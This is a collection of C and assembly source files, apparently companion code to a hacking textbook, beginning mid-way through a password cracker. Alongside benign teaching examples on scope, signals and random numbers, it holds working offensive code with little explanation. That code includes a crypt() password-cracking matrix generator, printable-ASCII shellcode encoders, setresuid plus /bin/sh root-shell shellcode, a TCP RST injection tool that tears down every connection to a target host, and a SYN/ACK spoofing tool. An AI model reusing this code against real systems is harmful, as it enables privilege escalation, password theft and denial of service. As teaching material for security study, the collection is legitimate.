+ 32; 186 | plain[2] = prob_vector2[0][j] + 32; 187 | plain[3] = prob_vector2[1][j] + 32; 188 | plain[4] = 0; 189 | if(strcmp(crypt(plain, "je"), pass) == 0) { 190 | printf("Password : %s\n", plain); 191 | i = 31337; 192 | j = 31337; 193 | } 194 | } 195 | } 196 | if(i < 31337) 197 | printf("Password wasn't salted with 'je' or is not 4 chars long.\n"); 198 | 199 | fclose(fd); 200 | } 201 | -------------------------------------------------------------------------------- /ppm_gen.c: -------------------------------------------------------------------------------- 1 | /*********************************************************\ 2 | * Password Probability Matrix * File: ppm_gen.c * 3 | *********************************************************** 4 | * * 5 | * Author: Jon Erickson <matrix@phiral.com> * 6 | * Organization: Phiral Research Laboratories * 7 | * * 8 | * This is the generate program for the PPM proof of * 9 | * concept. It generates a file called 4char.ppm, which * 10 | * contains information regarding all possible 4 * 11 | * character passwords salted with 'je'. This file can * 12 | * be used to quickly crack passwords found within this * 13 | * keyspace with the corresponding ppm_crack.c program. * 14 | * * 15 | \*********************************************************/ 16 | 17 | #define _XOPEN_SOURCE 18 | #include <unistd.h> 19 | #include <stdio.h> 20 | #include <stdlib.h> 21 | 22 | #define HEIGHT 16384 23 | #define WIDTH 1129 24 | #define DEPTH 8 25 | #define SIZE HEIGHT * WIDTH * DEPTH 26 | 27 | /* map a single hash byte to an enumerated value */ 28 | int enum_hashbyte(char a) { 29 | int i, j; 30 | i = (int)a; 31 | if((i >= 46) && (i <= 57)) 32 | j = i - 46; 33 | else if ((i >= 65) && (i <= 90)) 34 | j = i - 53; 35 | else if ((i >= 97) && (i <= 122)) 36 | j = i - 59; 37 | return j; 38 | } 39 | 40 | /* map 3 hash bytes to an enumerated value */ 41 | int enum_hashtriplet(char a, char b, char c) { 42 | return (((enum_hashbyte(c)%4)*4096)+(enum_hashbyte(a)*64)+enum_hashbyte(b)); 43 | } 44 | /* barf a message and exit */ 45 | void barf(char *message, char *extra) { 46 | printf(message, extra); 47 | exit(1); 48 | } 49 | 50 | /* Generate a 4char.ppm file with all possible 4 char passwords (salted w/ je) */ 51 | int main() { 52 | char plain[5]; 53 | char *code, *data; 54 | int i, j, k, l; 55 | unsigned int charval, val; 56 | FILE *handle; 57 | if (!(handle = fopen("4char.ppm", "w"))) 58 | barf("Error: Couldn't open file '4char.ppm' for writing.\n", NULL); 59 | 60 | data = (char *) malloc(SIZE); 61 | if (!(data)) 62 | barf("Error: Couldn't allocate memory.\n", NULL); 63 | 64 | for(i=32; i<127; i++) { 65 | for(j=32; j<127; j++) { 66 | printf("Adding %c%c** to 4char.ppm..\n", i, j); 67 | for(k=32; k<127; k++) { 68 | for(l=32; l<127; l++) { 69 | 70 | plain[0] = (char)i; // build every 71 | plain[1] = (char)j; // possible 4 byte 72 | plain[2] = (char)k; // password. 73 | plain[3] = (char)l; 74 | plain[4] = '\0'; 75 | code = crypt((const char *)plain, (const char *)"je"); // hash it 76 | 77 | /* lossfully store statistical info about the pairings */ 78 | val = enum_hashtriplet(code[2], code[3], code[4]); // store info about bytes 2-4 79 | charval = (i-32)*95 + (j-32); // first 2 plaintext bytes 80 | data[(val*WIDTH)+(charval/8)] |= (1<<(charval%8)); 81 | val += (HEIGHT * 4); 82 | charval = (k-32)*95 + (l-32); // last 2 plaintext bytes 83 | data[(val*WIDTH)+(charval/8)] |= (1<<(charval%8)); 84 | 85 | val = HEIGHT + enum_hashtriplet(code[4], code[5], code[6]); // bytes 4-6 86 | charval = (i-32)*95 + (j-32); // first 2 plaintext bytes 87 | data[(val*WIDTH)+(charval/8)] |= (1<<(charval%8)); 88 | val += (HEIGHT * 4); 89 | charval = (k-32)*95 + (l-32); // last 2 plaintext bytes 90 | data[(val*WIDTH)+(charval/8)] |= (1<<(charval%8)); 91 | 92 | val = (2 * HEIGHT) + enum_hashtriplet(code[6], code[7], code[8]); // bytes 6-8 93 | charval = (i-32)*95 + (j-32); // first 2 plaintext bytes 94 | data[(val*WIDTH)+(charval/8)] |= (1<<(charval%8)); 95 | val += (HEIGHT * 4); 96 | charval = (k-32)*95 + (l-32); // last 2 plaintext bytes 97 | data[(val*WIDTH)+(charval/8)] |= (1<<(charval%8)); 98 | 99 | val = (3 * HEIGHT) + enum_hashtriplet(code[8], code[9], code[10]); // bytes 8-10 100 | charval = (i-32)*95 + (j-32); // first 2 plaintext chars 101 | data[(val*WIDTH)+(charval/8)] |= (1<<(charval%8)); 102 | val += (HEIGHT * 4); 103 | charval = (k-32)*95 + (l-32); // last 2 plaintext bytes 104 | data[(val*WIDTH)+(charval/8)] |= (1<<(charval%8)); 105 | } 106 | } 107 | } 108 | } 109 | printf("finished.. saving..\n"); 110 | fwrite(data, SIZE, 1, handle); 111 | free(data); 112 | fclose(handle); 113 | } 114 | -------------------------------------------------------------------------------- /printable.s: -------------------------------------------------------------------------------- 1 | BITS 32 2 | push esp ; Put current ESP 3 | pop eax ; into EAX 4 | sub eax,0x39393333 ; Subtract printable values 5 | sub eax,0x72727550 ; to add 860 to EAX 6 | sub eax,0x54545421 7 | push eax ; Put EAX back into ESP 8 | pop esp ; Effectively ESP = ESP + 860 9 | and eax,0x454e4f4a 10 | and eax,0x3a313035 ; Zero out EAX 11 | 12 | sub eax,0x346d6d25 ; Subtract printable values 13 | sub eax,0x256d6d25 ; to make EAX = 0x80cde189 14 | sub eax,0x2557442d ; (last 4 bytes from shellcode.bin) 15 | push eax ; Push these bytes to stack at ESP 16 | sub eax,0x59316659 ; Subtract more printable values 17 | sub eax,0x59667766 ; to make EAX = 0x53e28951 18 | sub eax,0x7a537a79 ; (next 4 bytes of shellcode from the end) 19 | push eax 20 | sub eax,0x25696969 21 | sub eax,0x25786b5a 22 | sub eax,0x25774625 23 | push eax ; EAX = 0xe3896e69 24 | sub eax,0x366e5858 25 | sub eax,0x25773939 26 | sub eax,0x25747470 27 | push eax ; EAX = 0x622f6868 28 | sub eax,0x25257725 29 | sub eax,0x71717171 30 | sub eax,0x5869506a 31 | push eax ; EAX = 0x732f2f68 32 | sub eax,0x63636363 33 | sub eax,0x44307744 34 | sub eax,0x7a434957 35 | push eax ; EAX = 0x51580b6a 36 | sub eax,0x63363663 37 | sub eax,0x6d543057 38 | push eax ; EAX = 0x80cda4b0 39 | sub eax,0x54545454 40 | sub eax,0x304e4e25 41 | sub eax,0x32346f25 42 | sub eax,0x302d6137 43 | push eax ; EAX = 0x99c931db 44 | sub eax,0x78474778 45 | sub eax,0x78727272 46 | sub eax,0x774f4661 47 | push eax ; EAX = 0x31c03190 48 | sub eax,0x41704170 49 | sub eax,0x2d772d4e 50 | sub eax,0x32483242 51 | push eax ; EAX = 0x90909090 52 | push eax 53 | push eax ; build a NOP sled 54 | push eax 55 | push eax 56 | push eax 57 | push eax 58 | push eax 59 | push eax 60 | push eax 61 | push eax 62 | push eax 63 | push eax 64 | push eax 65 | push eax 66 | push eax 67 | push eax 68 | push eax 69 | push eax 70 | push eax 71 | push eax 72 | push eax 73 | 74 | -------------------------------------------------------------------------------- /printable_helper.c: -------------------------------------------------------------------------------- 1 | #include <stdio.h> 2 | #include <sys/stat.h> 3 | #include <ctype.h> 4 | #include <time.h> 5 | #include <stdlib.h> 6 | #include <string.h> 7 | 8 | #define CHR "%_01234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ-" 9 | 10 | int main(int argc, char* argv[]) 11 | { 12 | unsigned int targ, last, t[4], l[4]; 13 | unsigned int try, single, carry=0; 14 | int len, a, i, j, k, m, z, flag=0; 15 | char word[3][4]; 16 | unsigned char mem[70]; 17 | 18 | if(argc < 2) { 19 | printf("Usage: %s <EAX starting value> <EAX end value>\n", argv[0]); 20 | exit(1); 21 | } 22 | 23 | srand(time(NULL)); 24 | bzero(mem, 70); 25 | strcpy(mem, CHR); 26 | len = strlen(mem); 27 | strfry(mem); // randomize 28 | last = strtoul(argv[1], NULL, 0); 29 | targ = strtoul(argv[2], NULL, 0); 30 | 31 | printf("calculating printable values to subtract from EAX..\n\n"); 32 | t[3] = (targ & 0xff000000)>>24; // spliting by bytes 33 | t[2] = (targ & 0x00ff0000)>>16; 34 | t[1] = (targ & 0x0000ff00)>>8; 35 | t[0] = (targ & 0x000000ff); 36 | l[3] = (last & 0xff000000)>>24; 37 | l[2] = (last & 0x00ff0000)>>16; 38 | l[1] = (last & 0x0000ff00)>>8; 39 | l[0] = (last & 0x000000ff); 40 | 41 | for(a=1; a < 5; a++) { // value count 42 | carry = flag = 0; 43 | for(z=0; z < 4; z++) { // byte count 44 | for(i=0; i < len; i++) { 45 | for(j=0; j < len; j++) { 46 | for(k=0; k < len; k++) { 47 | for(m=0; m < len; m++) 48 | { 49 | if(a < 2) j = len+1; 50 | if(a < 3) k = len+1; 51 | if(a < 4) m = len+1; 52 | try = t[z] + carry+mem[i]+mem[j]+mem[k]+mem[m]; 53 | single = (try & 0x000000ff); 54 | if(single == l[z]) 55 | { 56 | carry = (try & 0x0000ff00)>>8; 57 | if(i < len) word[0][z] = mem[i]; 58 | if(j < len) word[1][z] = mem[j]; 59 | if(k < len) word[2][z] = mem[k]; 60 | if(m < len) word[3][z] = mem[m]; 61 | i = j = k = m = len+2; 62 | flag++; 63 | } 64 | } 65 | } 66 | } 67 | } 68 | } 69 | if(flag == 4) { // if all 4 bytes found 70 | printf("start: 0x%08x\n\n", last); 71 | for(i=0; i < a; i++) 72 | printf(" - 0x%08x\n", *((unsigned int *)word[i])); 73 | printf("-------------------\n"); 74 | printf("end: 0x%08x\n", targ); 75 | 76 | exit(0); 77 | } 78 | } 79 | } 80 | -------------------------------------------------------------------------------- /priv_shell: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shichao-an/hacking/8387734ae2c95ef7dda0f7c880d2d2c4e6606977/priv_shell -------------------------------------------------------------------------------- /priv_shell.s: -------------------------------------------------------------------------------- 1 | BITS 32 2 | 3 | ; setresuid(uid_t ruid, uid_t euid, uid_t suid); 4 | xor eax, eax ; zero out eax 5 | xor ebx, ebx ; zero out ebx 6 | xor ecx, ecx ; zero out ecx 7 | xor edx, edx ; zero out edx 8 | mov al, 0xa4 ; 164 (0xa4) for syscall #164 9 | int 0x80 ; setresuid(0, 0, 0) restore all root privs 10 | 11 | ; execve(const char *filename, char *const argv [], char *const envp[]) 12 | xor eax, eax ; make sure eax is zeroed again 13 | mov al, 11 ; syscall #11 14 | push ecx ; push some nulls for string termination 15 | push 0x68732f2f ; push "//sh" to the stack 16 | push 0x6e69622f ; push "/bin" to the stack 17 | mov ebx, esp ; put the address of "/bin//sh" into ebx, via esp 18 | push ecx ; push 32-bit null terminator to stack 19 | mov edx, esp ; this is an empty array for envp 20 | push ebx ; push string addr to stack above null terminator 21 | mov ecx, esp ; this is the argv array with string ptr 22 | int 0x80 ; execve("/bin//sh", ["/bin//sh", NULL], [NULL]) 23 | 24 | -------------------------------------------------------------------------------- /rand_example.c: -------------------------------------------------------------------------------- 1 | #include <stdio.h> 2 | #include <stdlib.h> 3 | 4 | int main() { 5 | int i; 6 | printf("RAND_MAX is %u\n", RAND_MAX); 7 | srand(time(0)); 8 | 9 | printf("random values from 0 to RAND_MAX\n"); 10 | for(i=0; i < 8; i++) 11 | printf("%d\n", rand()); 12 | printf("random values from 1 to 20\n"); 13 | for(i=0; i < 8; i++) 14 | printf("%d\n", (rand()%20)+1); 15 | } 16 | -------------------------------------------------------------------------------- /raw_tcpsniff.c: -------------------------------------------------------------------------------- 1 | #include <stdio.h> 2 | #include <stdlib.h> 3 | #include <string.h> 4 | #include <sys/socket.h> 5 | #include <netinet/in.h> 6 | #include <arpa/inet.h> 7 | 8 | #include "hacking.h" 9 | 10 | int main(void) { 11 | int i, recv_length, sockfd; 12 | u_char buffer[9000]; 13 | 14 | if ((sockfd = socket(PF_INET, SOCK_RAW, IPPROTO_TCP)) == -1) 15 | fatal("in socket"); 16 | 17 | for(i=0; i < 3; i++) { 18 | recv_length = recv(sockfd, buffer, 8000, 0); 19 | printf("Got a %d byte packet\n", recv_length); 20 | dump(buffer, recv_length); 21 | } 22 | } 23 | -------------------------------------------------------------------------------- /rst_hijack.c: -------------------------------------------------------------------------------- 1 | #include <libnet.h> 2 | #include <pcap.h> 3 | #include "hacking.h" 4 | 5 | void caught_packet(u_char *, const struct pcap_pkthdr *, const u_char *); 6 | int set_packet_filter(pcap_t *, struct in_addr *); 7 | 8 | struct data_pass { 9 | int libnet_handle; 10 | u_char *packet; 11 | }; 12 | 13 | int main(int argc, char *argv[]) { 14 | struct pcap_pkthdr cap_header; 15 | const u_char *packet, *pkt_data; 16 | pcap_t *pcap_handle; 17 | char errbuf[PCAP_ERRBUF_SIZE]; // same size as LIBNET_ERRBUF_SIZE 18 | char *device; 19 | u_long target_ip; 20 | int network; 21 | struct data_pass critical_libnet_data; 22 | 23 | if(argc < 1) { 24 | printf("Usage: %s <target IP>\n", argv[0]); 25 | exit(0); 26 | } 27 | target_ip = libnet_name_resolve(argv[1], LIBNET_RESOLVE); 28 | 29 | if (target_ip == -1) 30 | fatal("Invalid target address"); 31 | 32 | device = pcap_lookupdev(errbuf); 33 | if(device == NULL) 34 | fatal(errbuf); 35 | 36 | pcap_handle = pcap_open_live(device, 128, 1, 0, errbuf); 37 | if(pcap_handle == NULL) 38 | fatal(errbuf); 39 | 40 | critical_libnet_data.libnet_handle = libnet_open_raw_sock(IPPROTO_RAW); 41 | if(critical_libnet_data.libnet_handle == -1) 42 | libnet_error(LIBNET_ERR_FATAL, "can't open network interface. -- this program must run as root.\n"); 43 | 44 | libnet_init_packet(LIBNET_IP_H + LIBNET_TCP_H, &(critical_libnet_data.packet)); 45 | if (critical_libnet_data.packet == NULL) 46 | libnet_error(LIBNET_ERR_FATAL, "can't initialize packet memory.\n"); 47 | 48 | libnet_seed_prand(); 49 | 50 | set_packet_filter(pcap_handle, (struct in_addr *)&target_ip); 51 | 52 | printf("Resetting all TCP connections to %s on %s\n", argv[1], device); 53 | pcap_loop(pcap_handle, -1, caught_packet, (u_char *)&critical_libnet_data); 54 | 55 | pcap_close(pcap_handle); 56 | } 57 | 58 | /* sets a packet filter to look for established TCP connections to target_ip */ 59 | int set_packet_filter(pcap_t *pcap_hdl, struct in_addr *target_ip) { 60 | struct bpf_program filter; 61 | char filter_string[100]; 62 | 63 | sprintf(filter_string, "tcp[tcpflags] & tcp-ack != 0 and dst host %s", inet_ntoa(*target_ip)); 64 | 65 | printf("DEBUG: filter string is \'%s\'\n", filter_string); 66 | if(pcap_compile(pcap_hdl, &filter, filter_string, 0, 0) == -1) 67 | fatal("pcap_compile failed"); 68 | 69 | if(pcap_setfilter(pcap_hdl, &filter) == -1) 70 | fatal("pcap_setfilter failed"); 71 | } 72 | 73 | void caught_packet(u_char *user_args, const struct pcap_pkthdr *cap_header, const u_char *packet) { 74 | u_char *pkt_data; 75 | struct libnet_ip_hdr *IPhdr; 76 | struct libnet_tcp_hdr *TCPhdr; 77 | struct data_pass *passed; 78 | int bcount; 79 | 80 | passed = (struct data_pass *) user_args; // pass data using a pointer to a struct 81 | 82 | IPhdr = (struct libnet_ip_hdr *) (packet + LIBNET_ETH_H); 83 | TCPhdr = (struct libnet_tcp_hdr *) (packet + LIBNET_ETH_H + LIBNET_TCP_H); 84 | 85 | printf("resetting TCP connection from %s:%d ", 86 | inet_ntoa(IPhdr->ip_src), htons(TCPhdr->th_sport)); 87 | printf("<---> %s:%d\n", 88 | inet_ntoa(IPhdr->ip_dst), htons(TCPhdr->th_dport)); 89 | 90 | libnet_build_ip(LIBNET_TCP_H, // size of the packet sans IP header 91 | IPTOS_LOWDELAY, // IP tos 92 | libnet_get_prand(LIBNET_PRu16), // IP ID (randomized) 93 | 0, // frag stuff 94 | libnet_get_prand(LIBNET_PR8), // TTL (randomized) 95 | IPPROTO_TCP, // transport protocol 96 | *((u_long *)&(IPhdr->ip_dst)), // source IP (pretend we are dst) 97 | *((u_long *)&(IPhdr->ip_src)), // destination IP (send back to src) 98 | NULL, // payload (none) 99 | 0, // payload length 100 | passed->packet); // packet header memory 101 | 102 | libnet_build_tcp(htons(TCPhdr->th_dport),// source TCP port (pretend we are dst) 103 | htons(TCPhdr->th_sport), // destination TCP port (send back to src) 104 | htonl(TCPhdr->th_ack), // sequence number (use previous ack) 105 | libnet_get_prand(LIBNET_PRu32), // acknowledgement number (randomized) 106 | TH_RST, // control flags (RST flag set only) 107 | libnet_get_prand(LIBNET_PRu16), // window size (randomized) 108 | 0, // urgent pointer 109 | NULL, // payload (none) 110 | 0, // payload length 111 | (passed->packet) + LIBNET_IP_H);// packet header memory 112 | 113 | if (libnet_do_checksum(passed->packet, IPPROTO_TCP, LIBNET_TCP_H) == -1) 114 | libnet_error(LIBNET_ERR_FATAL, "can't compute checksum\n"); 115 | 116 | bcount = libnet_write_ip(passed->libnet_handle, passed->packet, LIBNET_IP_H+LIBNET_TCP_H); 117 | if (bcount < LIBNET_IP_H + LIBNET_TCP_H) 118 | libnet_error(LIBNET_ERR_WARNING, "Warning: Incomplete packet written."); 119 | 120 | usleep(5000); // pause slightly 121 | } 122 | -------------------------------------------------------------------------------- /scope.c: -------------------------------------------------------------------------------- 1 | #include <stdio.h> 2 | 3 | void func3() { 4 | int i = 11; 5 | printf("\t\t\t[in func3] i = %d\n", i); 6 | } 7 | 8 | void func2() { 9 | int i = 7; 10 | printf("\t\t[in func2] i = %d\n", i); 11 | func3(); 12 | printf("\t\t[back in func2] i = %d\n", i); 13 | } 14 | 15 | void func1() { 16 | int i = 5; 17 | printf("\t[in func1] i = %d\n", i); 18 | func2(); 19 | printf("\t[back in func1] i = %d\n", i); 20 | } 21 | 22 | int main() { 23 | int i = 3; 24 | printf("[in main] i = %d\n", i); 25 | func1(); 26 | printf("[back in main] i = %d\n", i); 27 | } 28 | -------------------------------------------------------------------------------- /scope2.c: -------------------------------------------------------------------------------- 1 | #include <stdio.h> 2 | 3 | int j = 42; // j is a global variable 4 | 5 | void func3() { 6 | int i = 11, j = 999; // here, j is a local variable of func3() 7 | printf("\t\t\t[in func3] i = %d, j = %d\n", i, j); 8 | } 9 | 10 | void func2() { 11 | int i = 7; 12 | printf("\t\t[in func2] i = %d, j = %d\n", i, j); 13 | printf("\t\t[in func2] setting j = 1337\n"); 14 | j = 1337; // writing to j 15 | func3(); 16 | printf("\t\t[back in func2] i = %d, j = %d\n", i, j); 17 | } 18 | 19 | void func1() { 20 | int i = 5; 21 | printf("\t[in func1] i = %d, j = %d\n", i, j); 22 | func2(); 23 | printf("\t[back in func1] i = %d, j = %d\n", i, j); 24 | } 25 | 26 | int main() { 27 | int i = 3; 28 | printf("[in main] i = %d, j = %d\n", i, j); 29 | func1(); 30 | printf("[back in main] i = %d, j = %d\n", i, j); 31 | } 32 | -------------------------------------------------------------------------------- /scope3.c: -------------------------------------------------------------------------------- 1 | #include <stdio.h> 2 | 3 | int j = 42; // j is a global variable 4 | 5 | void func3() { 6 | int i = 11, j = 999; // here, j is a local variable of func3() 7 | printf("\t\t\t[in func3] i @ 0x%08x = %d\n", &i, i); 8 | printf("\t\t\t[in func3] j @ 0x%08x = %d\n", &j, j); 9 | } 10 | 11 | void func2() { 12 | int i = 7; 13 | printf("\t\t[in func2] i @ 0x%08x = %d\n", &i, i); 14 | printf("\t\t[in func2] j @ 0x%08x = %d\n", &j, j); 15 | printf("\t\t[in func2] setting j = 1337\n"); 16 | j = 1337; // writing to j 17 | func3(); 18 | printf("\t\t[back in func2] i @ 0x%08x = %d\n", &i, i); 19 | printf("\t\t[back in func2] j @ 0x%08x = %d\n", &j, j); 20 | } 21 | 22 | void func1() { 23 | int i = 5; 24 | printf("\t[in func1] i @ 0x%08x = %d\n", &i, i); 25 | printf("\t[in func1] j @ 0x%08x = %d\n", &j, j); 26 | func2(); 27 | printf("\t[back in func1] i @ 0x%08x = %d\n", &i, i); 28 | printf("\t[back in func1] j @ 0x%08x = %d\n", &j, j); 29 | } 30 | 31 | int main() { 32 | int i = 3; 33 | printf("[in main] i @ 0x%08x = %d\n", &i, i); 34 | printf("[in main] j @ 0x%08x = %d\n", &j, j); 35 | func1(); 36 | printf("[back in main] i @ 0x%08x = %d\n", &i, i); 37 | printf("[back in main] j @ 0x%08x = %d\n", &j, j); 38 | } 39 | -------------------------------------------------------------------------------- /shellcode: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shichao-an/hacking/8387734ae2c95ef7dda0f7c880d2d2c4e6606977/shellcode -------------------------------------------------------------------------------- /shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shichao-an/hacking/8387734ae2c95ef7dda0f7c880d2d2c4e6606977/shellcode.bin -------------------------------------------------------------------------------- /shellcode.s: -------------------------------------------------------------------------------- 1 | BITS 32 2 | 3 | ; setresuid(uid_t ruid, uid_t euid, uid_t suid); 4 | xor eax, eax ; zero out eax 5 | xor ebx, ebx ; zero out ebx 6 | xor ecx, ecx ; zero out ecx 7 | cdq ; zero out edx using the sign bit from eax 8 | mov BYTE al, 0xa4 ; syscall 164 (0xa4) 9 | int 0x80 ; setresuid(0, 0, 0) restore all root privs 10 | 11 | ; execve(const char *filename, char *const argv [], char *const envp[]) 12 | push BYTE 11 ; push 11 to the stack 13 | pop eax ; pop dword of 11 into eax 14 | push ecx ; push some nulls for string termination 15 | push 0x68732f2f ; push "//sh" to the stack 16 | push 0x6e69622f ; push "/bin" to the stack 17 | mov ebx, esp ; put the address of "/bin//sh" into ebx, via esp 18 | push ecx ; push 32-bit null terminator to stack 19 | mov edx, esp ; this is an empty array for envp 20 | push ebx ; push string addr to stack above null terminator 21 | mov ecx, esp ; this is the argv array with string ptr 22 | int 0x80 ; execve("/bin//sh", ["/bin//sh", NULL], [NULL]) 23 | -------------------------------------------------------------------------------- /shroud.c: -------------------------------------------------------------------------------- 1 | #include <libnet.h> 2 | #include <pcap.h> 3 | #include "hacking.h" 4 | 5 | #define MAX_EXISTING_PORTS 30 6 | 7 | void caught_packet(u_char *, const struct pcap_pkthdr *, const u_char *); 8 | int set_packet_filter(pcap_t *, struct in_addr *, u_short *); 9 | 10 | struct data_pass { 11 | int libnet_handle; 12 | u_char *packet; 13 | }; 14 | 15 | int main(int argc, char *argv[]) { 16 | struct pcap_pkthdr cap_header; 17 | const u_char *packet, *pkt_data; 18 | pcap_t *pcap_handle; 19 | char errbuf[PCAP_ERRBUF_SIZE]; // same size as LIBNET_ERRBUF_SIZE 20 | char *device; 21 | u_long target_ip; 22 | int network, i; 23 | struct data_pass critical_libnet_data; 24 | u_short existing_ports[MAX_EXISTING_PORTS]; 25 | 26 | if((argc < 2) || (argc > MAX_EXISTING_PORTS+2)) { 27 | if(argc > 2) 28 | printf("Limited to tracking %d existing ports.\n", MAX_EXISTING_PORTS); 29 | else 30 | printf("Usage: %s <IP to shroud> [existing ports...]\n", argv[0]); 31 | exit(0); 32 | } 33 | 34 | target_ip = libnet_name_resolve(argv[1], LIBNET_RESOLVE); 35 | if (target_ip == -1) 36 | fatal("Invalid target address"); 37 | 38 | for(i=2; i < argc; i++) 39 | existing_ports[i-2] = (u_short) atoi(argv[i]); 40 | 41 | existing_ports[argc-2] = 0; 42 | 43 | device = pcap_lookupdev(errbuf); 44 | if(device == NULL) 45 | fatal(errbuf); 46 | 47 | pcap_handle = pcap_open_live(device, 128, 1, 0, errbuf); 48 | if(pcap_handle == NULL) 49 | fatal(errbuf); 50 | 51 | critical_libnet_data.libnet_handle = libnet_open_raw_sock(IPPROTO_RAW); 52 | if(critical_libnet_data.libnet_handle == -1) 53 | libnet_error(LIBNET_ERR_FATAL, "can't open network interface. -- this program must run as root.\n"); 54 | 55 | libnet_init_packet(LIBNET_IP_H + LIBNET_TCP_H, &(critical_libnet_data.packet)); 56 | if (critical_libnet_data.packet == NULL) 57 | libnet_error(LIBNET_ERR_FATAL, "can't initialize packet memory.\n"); 58 | 59 | libnet_seed_prand(); 60 | 61 | set_packet_filter(pcap_handle, (struct in_addr *)&target_ip, existing_ports); 62 | 63 | pcap_loop(pcap_handle, -1, caught_packet, (u_char *)&critical_libnet_data); 64 | pcap_close(pcap_handle); 65 | } 66 | 67 | /* sets a packet filter to look for established TCP connections to target_ip */ 68 | int set_packet_filter(pcap_t *pcap_hdl, struct in_addr *target_ip, u_short *ports) { 69 | struct bpf_program filter; 70 | char *str_ptr, filter_string[90 + (25 * MAX_EXISTING_PORTS)]; 71 | int i=0; 72 | 73 | sprintf(filter_string, "dst host %s and ", inet_ntoa(*target_ip)); // target IP 74 | strcat(filter_string, "tcp[tcpflags] & tcp-syn != 0 and tcp[tcpflags] & tcp-ack = 0"); 75 | 76 | if(ports[0] != 0) { // if there is at least one existing port 77 | str_ptr = filter_string + strlen(filter_string); 78 | if(ports[1] == 0) // there is only one existing port 79 | sprintf(str_ptr, " and not dst port %hu", ports[i]); 80 | else { // two or more existing ports 81 | sprintf(str_ptr, " and not (dst port %hu", ports[i++]); 82 | while(ports[i] != 0) { 83 | str_ptr = filter_string + strlen(filter_string); 84 | sprintf(str_ptr, " or dst port %hu", ports[i++]); 85 | } 86 | strcat(filter_string, ")"); 87 | } 88 | } 89 | printf("DEBUG: filter string is \'%s\'\n", filter_string); 90 | if(pcap_compile(pcap_hdl, &filter, filter_string, 0, 0) == -1) 91 | fatal("pcap_compile failed"); 92 | 93 | if(pcap_setfilter(pcap_hdl, &filter) == -1) 94 | fatal("pcap_setfilter failed"); 95 | } 96 | 97 | void caught_packet(u_char *user_args, const struct pcap_pkthdr *cap_header, const u_char *packet) { 98 | u_char *pkt_data; 99 | struct libnet_ip_hdr *IPhdr; 100 | struct libnet_tcp_hdr *TCPhdr; 101 | struct data_pass *passed; 102 | int bcount; 103 | 104 | passed = (struct data_pass *) user_args; // pass data using a pointer to a struct 105 | 106 | IPhdr = (struct libnet_ip_hdr *) (packet + LIBNET_ETH_H); 107 | TCPhdr = (struct libnet_tcp_hdr *) (packet + LIBNET_ETH_H + LIBNET_TCP_H); 108 | 109 | libnet_build_ip(LIBNET_TCP_H, // size of the packet sans IP header 110 | IPTOS_LOWDELAY, // IP tos 111 | libnet_get_prand(LIBNET_PRu16), // IP ID (randomized) 112 | 0, // frag stuff 113 | libnet_get_prand(LIBNET_PR8), // TTL (randomized) 114 | IPPROTO_TCP, // transport protocol 115 | *((u_long *)&(IPhdr->ip_dst)), // source IP (pretend we are dst) 116 | *((u_long *)&(IPhdr->ip_src)), // destination IP (send back to src) 117 | NULL, // payload (none) 118 | 0, // payload length 119 | passed->packet); // packet header memory 120 | 121 | libnet_build_tcp(htons(TCPhdr->th_dport),// source TCP port (pretend we are dst) 122 | htons(TCPhdr->th_sport), // destination TCP port (send back to src) 123 | htonl(TCPhdr->th_ack), // sequence number (use previous ack) 124 | htonl((TCPhdr->th_seq) + 1), // acknowledgement number (SYN's seq # + 1) 125 | TH_SYN | TH_ACK, // control flags (RST flag set only) 126 | libnet_get_prand(LIBNET_PRu16), // window size (randomized) 127 | 0, // urgent pointer 128 | NULL, // payload (none) 129 | 0, // payload length 130 | (passed->packet) + LIBNET_IP_H);// packet header memory 131 | 132 | if (libnet_do_checksum(passed->packet, IPPROTO_TCP, LIBNET_TCP_H) == -1) 133 | libnet_error(LIBNET_ERR_FATAL, "can't compute checksum\n"); 134 | 135 | bcount = libnet_write_ip(passed->libnet_handle, passed->packet, LIBNET_IP_H+LIBNET_TCP_H); 136 | if (bcount < LIBNET_IP_H + LIBNET_TCP_H) 137 | libnet_error(LIBNET_ERR_WARNING, "Warning: Incomplete packet written."); 138 | printf("bing!\n"); 139 | } 140 | -------------------------------------------------------------------------------- /signal_example.c: -------------------------------------------------------------------------------- 1 | #include <stdio.h> 2 | #include <stdlib.h> 3 | #include <signal.h> 4 | /* some labeled signal defines from signal.h 5 | * #define SIGHUP 1 hangup 6 | * #define SIGINT 2 interrupt (Ctrl-C) 7 | * #define SIGQUIT 3 quit (Ctrl-\) 8 | * #define SIGILL 4 illegal instruction 9 | * #define SIGTRAP 5 trace/breakpoint trap 10 | * #define SIGABRT 6 process aborted 11 | * #define SIGBUS 7 bus error 12 | * #define SIGFPE 8 floating point error 13 | * #define SIGKILL 9 kill 14 | * #define SIGUSR1 10 user defined signal 1 15 | * #define SIGSEGV 11 segmentation fault 16 | * #define SIGUSR2 12 user defined signal 2 17 | * #define SIGPIPE 13 write to pipe with no one reading 18 | * #define SIGALRM 14 countdown alarm set by alarm() 19 | * #define SIGTERM 15 termination (sent by kill command) 20 | * #define SIGCHLD 17 child process signal 21 | * #define SIGCONT 18 continue if stopped 22 | * #define SIGSTOP 19 stop (pause execution) 23 | * #define SIGTSTP 20 terminal stop [suspend] (Ctrl-Z) 24 | * #define SIGTTIN 21 background process trying to read stdin 25 | * #define SIGTTOU 22 background process trying to read stdout 26 | */ 27 | 28 | /* a signal handler */ 29 | void signal_handler(int signal) { 30 | printf("Caught signal %d\t", signal); 31 | if (signal == SIGTSTP) 32 | printf("SIGTSTP (Ctrl-Z)"); 33 | else if (signal == SIGQUIT) 34 | printf("SIGQUIT (Ctrl-\\)"); 35 | else if (signal == SIGUSR1) 36 | printf("SIGUSR1"); 37 | else if (signal == SIGUSR2) 38 | printf("SIGUSR2"); 39 | 40 | printf("\n"); 41 | } 42 | 43 | void sigint_handler(int x) { 44 | printf("Caught a Ctrl-C (SIGINT) in a separate handler\nExiting..\n"); 45 | exit(0); 46 | } 47 | 48 | int main() { 49 | /* registering signal handlers */ 50 | signal(SIGQUIT, signal_handler); // set signal_handler() as the 51 | signal(SIGTSTP, signal_handler); // signal handler for these 52 | signal(SIGUSR1, signal_handler); // signals 53 | signal(SIGUSR2, signal_handler); 54 | 55 | signal(SIGINT, sigint_handler); // set sigint_handler() for SIGINT 56 | 57 | while(1) {} // loop forever 58 | } 59 | 